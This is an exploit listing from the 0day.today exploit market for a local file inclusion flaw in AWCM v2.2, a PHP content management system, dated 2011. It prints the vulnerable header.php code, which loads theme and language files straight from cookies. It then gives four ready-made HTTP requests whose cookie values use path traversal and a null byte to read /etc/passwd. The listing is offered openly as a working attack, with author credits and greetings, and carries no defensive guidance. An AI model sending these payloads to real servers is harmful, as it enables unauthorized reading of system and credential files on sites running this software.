[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AWCM v2.2 final Local File Inclusion Vulnerability

Author
Cucura
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15329
Category
web applications
Date add
27-01-2011
Platform
php
[+]Exploit Title: [awcm v2.2 final Local File Inclusion]
[+]Date: [26-01-2011]
[+]Author: Cucura , Ste@lth (Bl@ck_Falc0n)
[+]Software Link: [www.awcm-cms.com]
[+]Version: [v2.2]
[+]CVE : -
[+]Contact: Blackcucura[at]Gmail.com
http://sourceforge.net/projects/awcm/files/
-----------------------------------------------------------------
 
Vuln C0de  in header.php
 
if(isset($_COOKIE['awcm_theme'])) {
    $theme_file = $_COOKIE['awcm_theme'];
} else {
    $theme_file = $mysql_maininfo_row['defult_theme'];
}
 
if(isset($_COOKIE['awcm_lang'])) {
    $lang_file = $_COOKIE['awcm_lang'];
} else {
    $lang_file = $mysql_maininfo_row['defult_language'];
}
 
 
-----------------------------------------------------------------
 
 
[+]Exploit: http://target/awcm/index.php
 
    GET http://192.168.43.173/awcm/index.php HTTP/1.0
    Cookie: awcm_theme=../../../../etc/passwd%00;
 
 
[+]Exploit: http://target/awcm/index.php
 
    GET http://192.168.43.173/awcm/index.php HTTP/1.0
    Cookie: awcm_lang=../../../../etc/passwd%00;
 
 
[+]Exploit: http://target/awcm/header.php
 
    GET http://192.168.43.173/awcm/header.php HTTP/1.0
    Cookie: awcm_lang=../../../../etc/passwd%00;
 
 
[+]Exploit: http://target/awcm/header.php
 
    GET http://192.168.43.173/awcm/header.php HTTP/1.0
    Cookie: awcm_theme=../../../../etc/passwd%00;
 
 
-----------------------------------------------------------------
Greetz : SpeeDr00t, ReDr0se, InsideJ , eidisky Bl@ck Falc0n Team



#  0day.today [2024-11-15]  #